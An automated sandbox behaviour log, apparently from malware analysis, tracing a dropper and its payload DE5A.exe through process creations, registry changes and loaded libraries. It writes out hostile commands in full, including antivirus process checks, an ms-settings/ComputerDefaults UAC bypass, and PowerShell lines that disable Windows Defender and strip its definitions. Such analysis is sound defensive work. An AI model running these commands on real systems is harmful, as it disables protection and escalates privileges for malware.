                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-ZZZU66
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeFile created: C:\Users\user\AppData\Local\Temp\nsaBCEC.tmpJump to behavior
                        Source: Og1SeeXcB2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: Og1SeeXcB2.exeReversingLabs: Detection: 18%
                        Source: DE5A.exeString found in binary or memory: set-addPolicy
                        Source: DE5A.exeString found in binary or memory: id-cmc-addExtensions
                        Source: DE5A.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                        Source: DE5A.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                        Source: DE5A.exeString found in binary or memory: --help
                        Source: DE5A.exeString found in binary or memory: --help
                        Source: DE5A.exeString found in binary or memory: can't send non-None value to a just-started async generator
                        Source: DE5A.exeString found in binary or memory: can't send non-None value to a just-started generator
                        Source: DE5A.exeString found in binary or memory: can't send non-None value to a just-started coroutine
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeFile read: C:\Users\user\Desktop\Og1SeeXcB2.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Og1SeeXcB2.exe "C:\Users\user\Desktop\Og1SeeXcB2.exe"
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "perulesserpalacecorrespondence" Video
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Outlook + Imports 1181\U
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif 1181\End.pif 1181\U
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                        Source: C:\Windows\SysWOW64\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\wsruwii C:\Users\user\AppData\Roaming\wsruwii
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults --nouacbypass
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                        Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete hkcu\Software\Classes\ms-settings /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "perulesserpalacecorrespondence" Video Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Outlook + Imports 1181\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif 1181\End.pif 1181\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to behavior
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults --nouacbypass
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                        Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete hkcu\Software\Classes\ms-settings /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
